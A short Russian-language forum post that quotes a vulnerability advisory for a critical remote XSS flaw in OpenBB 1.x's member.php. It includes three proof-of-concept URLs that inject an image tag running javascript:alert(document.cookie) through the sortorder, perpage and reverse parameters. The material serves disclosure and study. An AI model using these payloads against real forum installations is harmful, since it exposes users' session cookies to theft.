Форум АНТИЧАТ - Показать сообщение отдельно

Цитата:

Сообщение от webmaster_grm на hackzona.ru

http://www.hackzona.ru/hz.php?name=N...rder=0&thold=0
Опасность:критическая
Тип:удалённая
Описание:в параметр reverse в member.php можно внедрить произвольный HTML или JavaScript код и вызвать XSS
Уязвимые версии:OpenBB 1.x
Наличие эксплойта:нет
Решения:нет

Код:

member.php?action=list&sortorder=homepage&perpage="><img%20src=javascript:alert(document.cookie)>

Код:

member.php?action=list&sortorder=homepage&perpage=25&reverse=1"><img%20src=javascript:alert(document.cookie)>

Код:

member.php?action=list&sortorder="><img%20src=javascript:alert(document.cookie)>

_____________________________________

Хотя пользы с них минимум, но тем немение....